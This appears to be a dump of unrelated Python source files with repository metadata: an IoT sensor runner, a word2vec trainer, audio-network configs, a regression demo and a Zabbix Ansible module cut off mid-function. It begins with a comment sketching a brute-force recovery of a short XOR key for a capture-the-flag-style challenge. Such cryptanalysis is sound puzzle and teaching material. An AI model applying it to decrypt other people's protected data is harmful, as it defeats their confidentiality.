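# Illustrative solver sketch (not part of the challenge): since the key is
# only five lowercase letters and the plaintext is a decimal string, the
# output can be brute-forced offline. `blob` stands for the printed base64
# string and is an assumption:
#
# import base64, itertools, string
# c = base64.b64decode(blob).decode('latin-1')
# for cand in itertools.product(string.ascii_lowercase, repeat=5):
#     m = xors(c, ''.join(cand))
#     if m.isdigit():
#         print(''.join(cand), m)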
| 21.375 | 64 | 0.625731 |
2276649e30a49ae00ef1fdcdaee6ba13cd32a03a
| 4,209 |
py
|
Python
|
run.py
|
friskit-china/IoH
|
2728e9cfcc5316948b5dacbceb132c1dfcf285b6
|
[
"MIT"
] | null | null | null |
run.py
|
friskit-china/IoH
|
2728e9cfcc5316948b5dacbceb132c1dfcf285b6
|
[
"MIT"
] | null | null | null |
run.py
|
friskit-china/IoH
|
2728e9cfcc5316948b5dacbceb132c1dfcf285b6
|
[
"MIT"
] | null | null | null |
from easydict import EasyDict as edict
import argparse
from modules import BME280, SSD1306, Metering
import threading
import signal
import board
import busio
import logging
import time
import os
def metering_publish_worker(_g):
loop_sleep_time = _g.opt.iot_metering_publish_interval_sec
metering_module = _g.modules.metering_module
while metering_module.is_stop is not True:
start_time = time.time()
metering_module.update()
end_time = time.time()
        time.sleep(max(0, loop_sleep_time - (end_time - start_time)))  # never sleep a negative duration
pass
def bme280_update_worker(_g):
loop_sleep_time = _g.opt.bme280_interval_sec
bme280_module = _g.modules.bme280_module
while bme280_module.is_stop is not True:
start_time = time.time()
bme280_module.update()
end_time = time.time()
        time.sleep(max(0, loop_sleep_time - (end_time - start_time)))
def ssd1306_update_worker(_g):
loop_sleep_time = _g.opt.ssd1306_interval_sec
ssd1306_module = _g.modules.ssd1306_module
while _g.modules.ssd1306_module.is_stop is not True:
start_time = time.time()
ssd1306_module.update()
end_time = time.time()
        time.sleep(max(0, loop_sleep_time - (end_time - start_time)))
def init_logger(_g):
logger = logging.getLogger(__name__)
logger.setLevel(level=logging.INFO)
handler = logging.FileHandler(_g.opt.logger_filename)
handler.setLevel(logging.WARNING)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
logger.addHandler(handler)
logger.addHandler(console)
logger.warning('[Main] Logger ready')
return logger
def main():
_g = edict()
parser = argparse.ArgumentParser()
parser.add_argument('--smbus_port', type=int, default=1)
parser.add_argument('--bme280_address', type=int, default=0x76)
parser.add_argument('--bme280_interval_sec', type=int, default=1)
parser.add_argument('--pwm_address', type=int, default=0x40)
parser.add_argument('--ssd1306_address', type=int, default=0x3c)
parser.add_argument('--ssd1306_width', type=int, default=128)
parser.add_argument('--ssd1306_height', type=int, default=64)
parser.add_argument('--ssd1306_interval_sec', type=int, default=1)
parser.add_argument('--logger_filename', type=str, default='log.txt')
parser.add_argument('--iot_host', type=str, default='cloud.thingsboard.io')
parser.add_argument('--iot_metering_publish_interval_sec', type=int, default=2)
_g.opt = parser.parse_args()
_g.is_stop = False
_g.logger = init_logger(_g)
def exit_signal(signum, frame):
_g.logger.warning('[Main] Finalizing')
for module in _g.modules.values():
module.is_stop = True
_g.is_stop=True
signal.signal(signal.SIGINT, exit_signal)
signal.signal(signal.SIGTERM, exit_signal)
_g.i2c_bus = busio.I2C(board.SCL, board.SDA)
# init each modules
_g.modules = dict()
_g.modules.bme280_module = BME280(_g, _g.i2c_bus, _g.opt.bme280_address)
_g.modules.ssd1306_module = SSD1306(_g, _g.i2c_bus, _g.opt.ssd1306_address, width=_g.opt.ssd1306_width, height=_g.opt.ssd1306_height)
# _g.modules.metering_module = Metering(_g, _g.opt.iot_host)
_g.modules.metering_module = Metering(_g, ioh_host=None) # use environment variable
# multiple threading for each module
_g.threads = dict()
_g.threads.bme280_module_thread = threading.Thread(target=bme280_update_worker, args=(_g,))
_g.threads.ssd1306_module_thread = threading.Thread(target=ssd1306_update_worker, args=(_g,))
_g.threads.metering_module_thread = threading.Thread(target=metering_publish_worker, args=(_g,))
for thread_handle in _g.threads.values():
thread_handle.start()
# the main loop
while _g.is_stop is not True:
# nothing to do now.
time.sleep(0.1)
pass
if __name__ == '__main__':
print('program start')
main()
print('program finish')
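# Example invocation (illustrative; the values are assumptions; note that
# argparse parses these ints in base 10, so the I2C address 0x76 is written
# as 118):
#   python run.py --smbus_port 1 --bme280_address 118 \
#       --iot_metering_publish_interval_sec 5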
| 34.785124 | 138 | 0.690425 |
361ae394d7e1bfe400d29c39550fec271b2ff0b0
| 7,811 |
py
|
Python
|
scripts/train_word2vec.py
|
PyGeoL/GeoL
|
67a5bd2f63091e19041094c14d419055fa5ce6f0
|
[
"MIT"
] | 8 |
2018-03-09T16:44:38.000Z
|
2021-04-07T11:33:30.000Z
|
scripts/train_word2vec.py
|
PyGeoL/GeoL
|
67a5bd2f63091e19041094c14d419055fa5ce6f0
|
[
"MIT"
] | 4 |
2020-03-24T15:34:54.000Z
|
2021-06-01T21:54:33.000Z
|
scripts/train_word2vec.py
|
PyGeoL/GeoL
|
67a5bd2f63091e19041094c14d419055fa5ce6f0
|
[
"MIT"
] | 1 |
2020-05-13T14:30:55.000Z
|
2020-05-13T14:30:55.000Z
|
"""
Simple script to train a word2vec model. It takes as input a list of POI category chains (e.g. Shops & Services:Gas Stations).
It preprocesses the text and trains the word2vec model on the words at the requested level (e.g. level=2 -> Gas Stations).
"""
# Authors: Gianni Barlacchi <[email protected]>
# Michele Ferretti <[email protected]>
import argparse
import gensim
import logging
import os
import sys
from sklearn.manifold import TSNE
import matplotlib
matplotlib.use('Agg')  # non-interactive backend: render without opening display windows
import matplotlib.pyplot as plt
import multiprocessing
from geol.geol_logger.geol_logger import logger
from geol.utils.utils import pre_processing
def run_w2v_model(outputfolder, word_list, cbow, prefix, size, count, window, plot):
"""
Run Word2Vec model
"""
output = os.path.abspath(os.path.join(outputfolder, prefix + '_s'+str(size) +
'_ws' + str(window) + '_c' + str(count) + '.model'))
skip_gram = 1
if cbow:
skip_gram = 0
logger.info("Train w2v model - size: %s, min count: %s, window size: %s" %
(size, count, window))
model = gensim.models.Word2Vec(
word_list, sg=skip_gram, size=size, min_count=count, window=window, workers=4)
model.wv.save_word2vec_format(output, binary=False)
if plot:
tsne_plot(model, size, window, count, outputfolder, prefix)
def tsne_plot(model, size, window, count, outputfolder, prefix):
"""
Creates and TSNE model and plots it
"""
labels = []
tokens = []
for word in model.wv.vocab:
tokens.append(model[word])
labels.append(word)
tsne_model = TSNE(perplexity=40, n_components=2,
init='pca', n_iter=2500, random_state=23)
new_values = tsne_model.fit_transform(tokens)
x = []
y = []
for value in new_values:
x.append(value[0])
y.append(value[1])
plt.figure(figsize=(16, 16))
for i in range(len(x)):
plt.scatter(x[i], y[i])
plt.annotate(labels[i],
xy=(x[i], y[i]),
xytext=(5, 2),
textcoords='offset points',
ha='right',
va='bottom')
plt.title('Size:'+str(size)+' Window:'+str(window)+' Count:'+str(count))
plt.savefig(os.path.abspath(os.path.join(outputfolder, 'imgs', prefix + '_s' + str(size)+'_ws' + str(window) +
'_c'+str(count)+'.png')), bbox_inches='tight')
plt.show()
def main(argv):
parser = argparse.ArgumentParser('Build your own Word2Vec embeddings.')
parser.add_argument('-i', '--inputfile',
help='Input file.',
action='store',
dest='input',
required=True,
type=str)
parser.add_argument('-o', '--outputfolder',
help='Output folder where to save the grids.',
action='store',
dest='outputfolder',
required=True,
type=str)
parser.add_argument('-p', '--prefix',
action='store',
dest='prefix',
help='Prefix for the filename in the form <prefix>_<grid_type>_<cell_size>. By default is w2v',
default='w2v',
type=str)
parser.add_argument('-plt', '--plot',
action='store_true',
dest='plot',
help='t-SNE plot',
default=False
)
parser.add_argument('-l', '--level',
help='Level of depth in the categories chain (default=5).',
dest='level',
default=5,
type=int)
# ----- W2V params -----
parser.add_argument('-cb', '--cbow',
action='store_true',
dest='cbow',
help='Use it to train the model with CBOW. By default is Skip-Gram.',
default=False)
parser.add_argument('-s', '--size',
help='List of vector sizes (s1, s2, ..), default = 50.',
dest='sizes',
nargs="+",
default=[50],
type=int)
    parser.add_argument('-ws', '--window_size',
help='List of window sizes (s1, s2, ..), default = 5.',
dest='windows',
nargs="+",
default=[5],
type=int)
parser.add_argument('-c', '--min_count',
help='List of minimum count sizes (s1, s2, ..), default = 5.',
dest='counts',
nargs="+",
default=[5],
type=int)
# ----- end W2V params -----
parser.add_argument('-m', '--multiprocessing',
help='Abilitate multiprocessing (strongly suggested when more CPUs are available)',
dest='mp',
action='store_true',
default=False)
parser.add_argument('-v', '--verbose',
help='Level of output verbosity.',
action='store',
dest='verbosity',
default=0,
type=int,
nargs="?")
args = parser.parse_args()
if(args.verbosity == 1):
logger.setLevel(logging.INFO)
    elif(args.verbosity == 2):
        logger.setLevel(logging.DEBUG)
if args.mp == True:
jobs = []
# ------ pre-processing text ------
logger.info("Preprocessing text")
# Load data and normalize the text
with open(args.input, 'r', encoding="utf-8") as input:
text = input.read()
# Split on new lines and remove empty lines
labels_list = [x.split('\t') for x in list(
filter(None, text.encode('utf-8').decode('utf-8').split('\n')))]
# Select the words based on the depth level
word_list = pre_processing(labels_list, args.level)
# ------ end pre-processing text ------
# Train models
for size in args.sizes:
for window in args.windows:
for count in args.counts:
try:
if args.mp == True:
p = multiprocessing.Process(target=run_w2v_model,
args=(args.outputfolder, word_list, args.cbow, args.prefix, size, count, window, args.plot))
jobs.append(p)
p.start()
# else:
# output = os.path.abspath(os.path.join(args.outputfolder,
# args.prefix + '_s' + str(size) + '_ws'+str(window)+'_c'+str(count)+'.model'))
run_w2v_model(args.outputfolder, word_list, args.cbow,
args.prefix, size, count, window, args.plot)
except ValueError:
logger.error(
"Value error instantiating the grid.", exc_info=True)
sys.exit(1)
except TypeError:
logger.error(
"Type error building the grid.", exc_info=True)
sys.exit(1)
if __name__ == "__main__":
main(sys.argv[1:])
with open("data/barcelona/geotext_sequences/barcelona_100__test_distance.txt", 'r', encoding="utf-8") as input:
text = input.read()
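# Example invocation (illustrative; the file and folder names are assumptions;
# note that tsne_plot saves into an `imgs` subfolder of the output folder,
# which must already exist when -plt is used):
#   python train_word2vec.py -i pois.txt -o models -p foursquare -l 2 \
#       -s 50 100 -ws 5 10 -c 5 -plt -v 1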
| 34.409692 | 144 | 0.495839 |
7fe186869b6e2c2057a444929ef8ce5e1713aef7
| 589 |
py
|
Python
|
asteroid/masknn/_dccrn_architectures.py
|
groadabike/asteroid
|
276d98346ab791d904fbfe79b9b8e374392dd128
|
[
"MIT"
] | 1 |
2020-12-18T02:42:23.000Z
|
2020-12-18T02:42:23.000Z
|
asteroid/masknn/_dccrn_architectures.py
|
groadabike/asteroid
|
276d98346ab791d904fbfe79b9b8e374392dd128
|
[
"MIT"
] | null | null | null |
asteroid/masknn/_dccrn_architectures.py
|
groadabike/asteroid
|
276d98346ab791d904fbfe79b9b8e374392dd128
|
[
"MIT"
] | null | null | null |
from ._dcunet_architectures import make_unet_encoder_decoder_args
# fmt: off
DCCRN_ARCHITECTURES = {
"DCCRN-CL": make_unet_encoder_decoder_args(
# Encoders:
# (in_chan, out_chan, kernel_size, stride, padding)
[
( 1, 32, (5, 2), (2, 1), (2, 0)),
( 32, 64, (5, 2), (2, 1), (2, 1)),
( 64, 128, (5, 2), (2, 1), (2, 0)),
(128, 256, (5, 2), (2, 1), (2, 1)),
(256, 256, (5, 2), (2, 1), (2, 0)),
(256, 256, (5, 2), (2, 1), (2, 1)),
],
# Decoders: auto
"auto",
),
}
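# Illustrative lookup (a sketch; assumes make_unet_encoder_decoder_args
# returns the (encoder_args, decoder_args) pair suggested by the "auto"
# decoder entry above):
#
# encoders, decoders = DCCRN_ARCHITECTURES["DCCRN-CL"]
# in_chan, out_chan, kernel_size, stride, padding = encoders[0]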
| 29.45 | 65 | 0.427844 |
e9ef11a39c98c5d3cf19544fc6454e555cfa3890
| 1,090 |
py
|
Python
|
py/Regression.py
|
fatho/rot-2015
|
7729d1ef76460a45a7a76003bdf3c80312f74a19
|
[
"MIT"
] | null | null | null |
py/Regression.py
|
fatho/rot-2015
|
7729d1ef76460a45a7a76003bdf3c80312f74a19
|
[
"MIT"
] | null | null | null |
py/Regression.py
|
fatho/rot-2015
|
7729d1ef76460a45a7a76003bdf3c80312f74a19
|
[
"MIT"
] | null | null | null |
import numpy as np
import numpy.random as rand
import scipy as sp
import matplotlib.pyplot as plt
def gen_training(func, x, var=1):
y = func(x)
y += rand.normal(0, var, y.shape)
return y
def const(x):
return lambda y: x
def lms(funcs, x, y, alpha):
(m,) = x.shape
(n,) = funcs.shape
w = np.zeros(n)
for c in range(10000):
for i in range(m):
for j in range(n):
val = 0
for k in range(n):
val += funcs[k](x[i]) * w[k]
                # LMS update: the gradient w.r.t. w[j] uses the j-th basis function
                w[j] = w[j] + alpha * funcs[j](x[i]) * (y[i] - val)
return w
def build_func(funcs, w):
(n,) = funcs.shape
def f(x):
val = 0
for i in range(n):
val += funcs[i](x) * w[i]
return val
return f
# (x, y) = gen_training(lambda x: x, 0, 2*np.pi, 100)
x = np.linspace(0, 2*np.pi, 100)
y = gen_training(lambda x: np.sin(x) + (x/np.pi)**2, x, 0.2)
funcs = np.array([const(1), np.sin, lambda x:x**2])
w = lms(funcs, x, y, 0.0001)
f = build_func(funcs, w)
print(w)
plt.scatter(x, y)
plt.plot(x, f(x))
plt.show()
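# Illustrative variation (a sketch): the same LMS routine fits any basis,
# e.g. swapping the quadratic term for a cosine; names as defined above:
#
# funcs2 = np.array([const(1), np.sin, np.cos])
# w2 = lms(funcs2, x, y, 0.0001)
# plt.plot(x, build_func(funcs2, w2)(x))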
| 20.185185 | 60 | 0.516514 |
62ea174757e4ab24dcf18dfa87893e80754eb324
| 25,749 |
py
|
Python
|
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/zabbix_mediatype.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/zabbix_mediatype.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/zabbix_mediatype.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: zabbix_mediatype
short_description: Create/Update/Delete Zabbix media types
description:
- This module allows you to create, modify and delete Zabbix media types.
author:
- Ruben Tsirunyan (@rubentsirunyan)
requirements:
- "zabbix-api >= 0.5.4"
options:
name:
type: 'str'
description:
- Name of the media type.
required: true
state:
type: 'str'
description:
- Desired state of the mediatype.
- On C(present), it will create a mediatype if it does not exist or update the mediatype if the associated data is different.
- On C(absent), it will remove the mediatype if it exists.
choices:
- present
- absent
default: 'present'
type:
type: 'str'
description:
- Type of the media type.
      - Media types I(jabber) and I(ez_texting) work only with Zabbix 4.2 or earlier.
choices:
- email
- script
- sms
- jabber
- ez_texting
required: true
status:
type: 'str'
description:
      - Whether the media type is enabled or not.
choices:
- enabled
- disabled
default: 'enabled'
max_sessions:
type: 'int'
description:
- The maximum number of alerts that can be processed in parallel.
- Possible value is 1 when I(type=sms) and 0-100 otherwise.
default: 1
max_attempts:
type: 'int'
description:
- The maximum number of attempts to send an alert.
- Possible range is 0-10
default: 3
attempt_interval:
type: 'int'
description:
- The interval between retry attempts.
- Possible range is 0-60
default: 10
script_name:
type: 'str'
description:
- The name of the executed script.
- Required when I(type=script).
script_params:
type: 'list'
elements: str
description:
- List of script parameters.
- Required when I(type=script).
gsm_modem:
type: 'str'
description:
- Serial device name of the gsm modem.
- Required when I(type=sms).
username:
type: 'str'
description:
- Username or Jabber identifier.
- Required when I(type=jabber) or I(type=ez_texting).
- Required when I(type=email) and I(smtp_authentication=true).
password:
type: 'str'
description:
- Authentication password.
- Required when I(type=jabber) or I(type=ez_texting).
- Required when I(type=email) and I(smtp_authentication=true).
smtp_server:
type: 'str'
description:
- SMTP server host.
- Required when I(type=email).
default: 'localhost'
smtp_server_port:
type: 'int'
description:
- SMTP server port.
- Required when I(type=email).
default: 25
smtp_helo:
type: 'str'
description:
- SMTP HELO.
- Required when I(type=email).
default: 'localhost'
smtp_email:
type: 'str'
description:
- Email address from which notifications will be sent.
- Required when I(type=email).
smtp_authentication:
type: 'bool'
description:
- Whether SMTP authentication with username and password should be enabled or not.
- If set to C(true), C(username) and C(password) should be specified.
default: false
smtp_security:
type: 'str'
description:
- SMTP connection security level to use.
choices:
- None
- STARTTLS
- SSL/TLS
smtp_verify_host:
type: 'bool'
description:
- SSL verify host for SMTP.
- Can be specified when I(smtp_security=STARTTLS) or I(smtp_security=SSL/TLS)
default: false
smtp_verify_peer:
type: 'bool'
description:
- SSL verify peer for SMTP.
- Can be specified when I(smtp_security=STARTTLS) or I(smtp_security=SSL/TLS)
default: false
message_text_limit:
type: 'str'
description:
- The message text limit.
- Required when I(type=ez_texting).
- 160 characters for USA and 136 characters for Canada.
choices:
- USA
- Canada
extends_documentation_fragment:
- community.general.zabbix
'''
RETURN = r''' # '''
EXAMPLES = r'''
- name: 'Create an email mediatype with SMTP authentication'
zabbix_mediatype:
name: "Ops email"
server_url: "http://example.com/zabbix/"
login_user: Admin
login_password: "zabbix"
type: 'email'
smtp_server: 'example.com'
smtp_server_port: 2000
smtp_email: '[email protected]'
smtp_authentication: true
username: 'smtp_user'
password: 'smtp_pass'
- name: 'Create a script mediatype'
zabbix_mediatype:
name: "my script"
server_url: "http://example.com/zabbix/"
login_user: Admin
login_password: "zabbix"
type: 'script'
script_name: 'my_script.py'
script_params:
- 'arg1'
- 'arg2'
- name: 'Create a jabber mediatype'
zabbix_mediatype:
name: "My jabber"
server_url: "http://example.com/zabbix/"
login_user: Admin
login_password: "zabbix"
type: 'jabber'
username: 'jabber_id'
password: 'jabber_pass'
- name: 'Create an SMS mediatype'
zabbix_mediatype:
name: "My SMS Mediatype"
server_url: "http://example.com/zabbix/"
login_user: Admin
login_password: "zabbix"
type: 'sms'
gsm_modem: '/dev/ttyS0'
'''
import atexit
import traceback
from ansible.module_utils.basic import AnsibleModule, missing_required_lib
from distutils.version import LooseVersion
try:
from zabbix_api import ZabbixAPI
HAS_ZABBIX_API = True
except ImportError:
ZBX_IMP_ERR = traceback.format_exc()
HAS_ZABBIX_API = False
def to_numeric_value(value, strs):
return strs.get(value)
def validate_params(module, params):
"""Validates arguments that are required together.
Fails the module with the message that shows the missing
requirements if there are some.
Args:
module: AnsibleModule object.
params (list): Each element of this list
is a list like
['argument_key', 'argument_value', ['required_arg_1',
'required_arg_2']].
Format is the same as `required_if` parameter of AnsibleModule.
"""
for param in params:
if module.params[param[0]] == param[1]:
if None in [module.params[i] for i in param[2]]:
module.fail_json(
msg="Following arguments are required when {key} is {value}: {arguments}".format(
key=param[0],
value=param[1],
arguments=', '.join(param[2])
)
)
def construct_parameters(**kwargs):
"""Translates data to a format suitable for Zabbix API and filters
the ones that are related to the specified mediatype type.
Args:
**kwargs: Arguments passed to the module.
Returns:
A dictionary of arguments that are related to kwargs['transport_type'],
and are in a format that is understandable by Zabbix API.
"""
if kwargs['transport_type'] == 'email':
return dict(
description=kwargs['name'],
status=to_numeric_value(kwargs['status'],
{'enabled': '0',
'disabled': '1'}),
type=to_numeric_value(kwargs['transport_type'],
{'email': '0',
'script': '1',
'sms': '2',
'jabber': '3',
'ez_texting': '100'}),
maxsessions=str(kwargs['max_sessions']),
maxattempts=str(kwargs['max_attempts']),
attempt_interval=str(kwargs['attempt_interval']),
smtp_server=kwargs['smtp_server'],
smtp_port=str(kwargs['smtp_server_port']),
smtp_helo=kwargs['smtp_helo'],
smtp_email=kwargs['smtp_email'],
smtp_security=to_numeric_value(str(kwargs['smtp_security']),
{'None': '0',
'STARTTLS': '1',
'SSL/TLS': '2'}),
smtp_authentication=to_numeric_value(str(kwargs['smtp_authentication']),
{'False': '0',
'True': '1'}),
smtp_verify_host=to_numeric_value(str(kwargs['smtp_verify_host']),
{'False': '0',
'True': '1'}),
smtp_verify_peer=to_numeric_value(str(kwargs['smtp_verify_peer']),
{'False': '0',
'True': '1'}),
username=kwargs['username'],
passwd=kwargs['password']
)
elif kwargs['transport_type'] == 'script':
if kwargs['script_params'] is None:
_script_params = '' # ZBX-15706
else:
_script_params = '\n'.join(str(i) for i in kwargs['script_params']) + '\n'
return dict(
description=kwargs['name'],
status=to_numeric_value(kwargs['status'],
{'enabled': '0',
'disabled': '1'}),
type=to_numeric_value(kwargs['transport_type'],
{'email': '0',
'script': '1',
'sms': '2',
'jabber': '3',
'ez_texting': '100'}),
maxsessions=str(kwargs['max_sessions']),
maxattempts=str(kwargs['max_attempts']),
attempt_interval=str(kwargs['attempt_interval']),
exec_path=kwargs['script_name'],
exec_params=_script_params
)
elif kwargs['transport_type'] == 'sms':
return dict(
description=kwargs['name'],
status=to_numeric_value(kwargs['status'],
{'enabled': '0',
'disabled': '1'}),
type=to_numeric_value(kwargs['transport_type'],
{'email': '0',
'script': '1',
'sms': '2',
'jabber': '3',
'ez_texting': '100'}),
maxsessions=str(kwargs['max_sessions']),
maxattempts=str(kwargs['max_attempts']),
attempt_interval=str(kwargs['attempt_interval']),
gsm_modem=kwargs['gsm_modem']
)
elif kwargs['transport_type'] == 'jabber' and LooseVersion(kwargs['zbx_api_version']) <= LooseVersion('4.2'):
return dict(
description=kwargs['name'],
status=to_numeric_value(kwargs['status'],
{'enabled': '0',
'disabled': '1'}),
type=to_numeric_value(kwargs['transport_type'],
{'email': '0',
'script': '1',
'sms': '2',
'jabber': '3',
'ez_texting': '100'}),
maxsessions=str(kwargs['max_sessions']),
maxattempts=str(kwargs['max_attempts']),
attempt_interval=str(kwargs['attempt_interval']),
username=kwargs['username'],
passwd=kwargs['password']
)
elif kwargs['transport_type'] == 'ez_texting' and LooseVersion(kwargs['zbx_api_version']) <= LooseVersion('4.2'):
return dict(
description=kwargs['name'],
status=to_numeric_value(kwargs['status'],
{'enabled': '0',
'disabled': '1'}),
type=to_numeric_value(kwargs['transport_type'],
{'email': '0',
'script': '1',
'sms': '2',
'jabber': '3',
'ez_texting': '100'}),
maxsessions=str(kwargs['max_sessions']),
maxattempts=str(kwargs['max_attempts']),
attempt_interval=str(kwargs['attempt_interval']),
username=kwargs['username'],
passwd=kwargs['password'],
exec_path=to_numeric_value(kwargs['message_text_limit'],
{'USA': '0',
'Canada': '1'}),
)
return {'unsupported_parameter': kwargs['transport_type'], 'zbx_api_version': kwargs['zbx_api_version']}
def check_if_mediatype_exists(module, zbx, name, zbx_api_version):
"""Checks if mediatype exists.
Args:
module: AnsibleModule object
zbx: ZabbixAPI object
name: Zabbix mediatype name
Returns:
Tuple of (True, `id of the mediatype`) if mediatype exists, (False, None) otherwise
"""
filter_key_name = 'description'
if LooseVersion(zbx_api_version) >= LooseVersion('4.4'):
# description key changed to name key from zabbix 4.4
filter_key_name = 'name'
try:
mediatype_list = zbx.mediatype.get({
'output': 'extend',
'filter': {filter_key_name: [name]}
})
if len(mediatype_list) < 1:
return False, None
else:
return True, mediatype_list[0]['mediatypeid']
except Exception as e:
module.fail_json(msg="Failed to get ID of the mediatype '{name}': {e}".format(name=name, e=e))
def diff(existing, new):
"""Constructs the diff for Ansible's --diff option.
Args:
existing (dict): Existing mediatype data.
new (dict): New mediatype data.
Returns:
A dictionary like {'before': existing, 'after': new}
with filtered empty values.
"""
before = {}
after = {}
for key in new:
before[key] = existing[key]
if new[key] is None:
after[key] = ''
else:
after[key] = new[key]
return {'before': before, 'after': after}
def get_update_params(module, zbx, mediatype_id, **kwargs):
"""Filters only the parameters that are different and need to be updated.
Args:
module: AnsibleModule object.
zbx: ZabbixAPI object.
mediatype_id (int): ID of the mediatype to be updated.
**kwargs: Parameters for the new mediatype.
Returns:
A tuple where the first element is a dictionary of parameters
that need to be updated and the second one is a dictionary
returned by diff() function with
existing mediatype data and new params passed to it.
"""
existing_mediatype = zbx.mediatype.get({
'output': 'extend',
'mediatypeids': [mediatype_id]
})[0]
if existing_mediatype['type'] != kwargs['type']:
return kwargs, diff(existing_mediatype, kwargs)
else:
params_to_update = {}
for key in kwargs:
if (not (kwargs[key] is None and existing_mediatype[key] == '')) and kwargs[key] != existing_mediatype[key]:
params_to_update[key] = kwargs[key]
return params_to_update, diff(existing_mediatype, kwargs)
def delete_mediatype(module, zbx, mediatype_id):
try:
return zbx.mediatype.delete([mediatype_id])
except Exception as e:
module.fail_json(msg="Failed to delete mediatype '{_id}': {e}".format(_id=mediatype_id, e=e))
def update_mediatype(module, zbx, **kwargs):
try:
        mediatype_id = zbx.mediatype.update(kwargs)
        return mediatype_id  # propagate the API result so the caller can report it
except Exception as e:
module.fail_json(msg="Failed to update mediatype '{_id}': {e}".format(_id=kwargs['mediatypeid'], e=e))
def create_mediatype(module, zbx, **kwargs):
try:
        mediatype_id = zbx.mediatype.create(kwargs)
        return mediatype_id  # propagate the API result so the caller can report it
except Exception as e:
module.fail_json(msg="Failed to create mediatype '{name}': {e}".format(name=kwargs['description'], e=e))
def main():
argument_spec = dict(
server_url=dict(type='str', required=True, aliases=['url']),
login_user=dict(type='str', required=True),
login_password=dict(type='str', required=True, no_log=True),
http_login_user=dict(type='str', required=False, default=None),
http_login_password=dict(type='str', required=False, default=None, no_log=True),
        validate_certs=dict(type='bool', required=False, default=True),
        timeout=dict(type='int', default=10),
name=dict(type='str', required=True),
state=dict(type='str', default='present', choices=['present', 'absent']),
type=dict(type='str', choices=['email', 'script', 'sms', 'jabber', 'ez_texting'], required=True),
status=dict(type='str', default='enabled', choices=['enabled', 'disabled'], required=False),
max_sessions=dict(type='int', default=1, required=False),
max_attempts=dict(type='int', default=3, required=False),
attempt_interval=dict(type='int', default=10, required=False),
# Script
script_name=dict(type='str', required=False),
script_params=dict(type='list', required=False),
# SMS
gsm_modem=dict(type='str', required=False),
# Jabber
username=dict(type='str', required=False),
password=dict(type='str', required=False, no_log=True),
# Email
smtp_server=dict(type='str', default='localhost', required=False),
smtp_server_port=dict(type='int', default=25, required=False),
smtp_helo=dict(type='str', default='localhost', required=False),
smtp_email=dict(type='str', required=False),
smtp_security=dict(type='str', required=False, choices=['None', 'STARTTLS', 'SSL/TLS']),
smtp_authentication=dict(type='bool', default=False, required=False),
smtp_verify_host=dict(type='bool', default=False, required=False),
smtp_verify_peer=dict(type='bool', default=False, required=False),
# EZ Text
message_text_limit=dict(type='str', required=False, choices=['USA', 'Canada'])
)
required_params = [
['type', 'email', ['smtp_email']],
['type', 'script', ['script_name']],
['type', 'sms', ['gsm_modem']],
['type', 'jabber', ['username', 'password']],
['type', 'ez_texting', ['username', 'password', 'message_text_limit']],
['smtp_authentication', True, ['username', 'password']]
]
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True
)
if module.params['state'] == 'present':
validate_params(module, required_params)
if not HAS_ZABBIX_API:
module.fail_json(msg=missing_required_lib('zabbix-api', url='https://pypi.org/project/zabbix-api/'), exception=ZBX_IMP_ERR)
server_url = module.params['server_url']
login_user = module.params['login_user']
login_password = module.params['login_password']
http_login_user = module.params['http_login_user']
http_login_password = module.params['http_login_password']
validate_certs = module.params['validate_certs']
state = module.params['state']
timeout = module.params['timeout']
name = module.params['name']
transport_type = module.params['type']
status = module.params['status']
max_sessions = module.params['max_sessions']
max_attempts = module.params['max_attempts']
attempt_interval = module.params['attempt_interval']
# Script
script_name = module.params['script_name']
script_params = module.params['script_params']
# SMS
gsm_modem = module.params['gsm_modem']
# Jabber
username = module.params['username']
password = module.params['password']
# Email
smtp_server = module.params['smtp_server']
smtp_server_port = module.params['smtp_server_port']
smtp_helo = module.params['smtp_helo']
smtp_email = module.params['smtp_email']
smtp_security = module.params['smtp_security']
smtp_authentication = module.params['smtp_authentication']
smtp_verify_host = module.params['smtp_verify_host']
smtp_verify_peer = module.params['smtp_verify_peer']
# EZ Text
message_text_limit = module.params['message_text_limit']
zbx = None
# login to zabbix
try:
zbx = ZabbixAPI(server_url, timeout=timeout, user=http_login_user, passwd=http_login_password,
validate_certs=validate_certs)
zbx.login(login_user, login_password)
atexit.register(zbx.logout)
except Exception as e:
module.fail_json(msg="Failed to connect to Zabbix server: %s" % e)
zbx_api_version = zbx.api_version()[:3]
mediatype_exists, mediatype_id = check_if_mediatype_exists(module, zbx, name, zbx_api_version)
parameters = construct_parameters(
name=name,
transport_type=transport_type,
status=status,
max_sessions=max_sessions,
max_attempts=max_attempts,
attempt_interval=attempt_interval,
script_name=script_name,
script_params=script_params,
gsm_modem=gsm_modem,
username=username,
password=password,
smtp_server=smtp_server,
smtp_server_port=smtp_server_port,
smtp_helo=smtp_helo,
smtp_email=smtp_email,
smtp_security=smtp_security,
smtp_authentication=smtp_authentication,
smtp_verify_host=smtp_verify_host,
smtp_verify_peer=smtp_verify_peer,
message_text_limit=message_text_limit,
zbx_api_version=zbx_api_version
)
if 'unsupported_parameter' in parameters:
module.fail_json(msg="%s is unsupported for Zabbix version %s" % (parameters['unsupported_parameter'], parameters['zbx_api_version']))
if LooseVersion(zbx_api_version) >= LooseVersion('4.4'):
# description key changed to name key from zabbix 4.4
parameters['name'] = parameters.pop('description')
if mediatype_exists:
if state == 'absent':
if module.check_mode:
module.exit_json(
changed=True,
msg="Mediatype would have been deleted. Name: {name}, ID: {_id}".format(
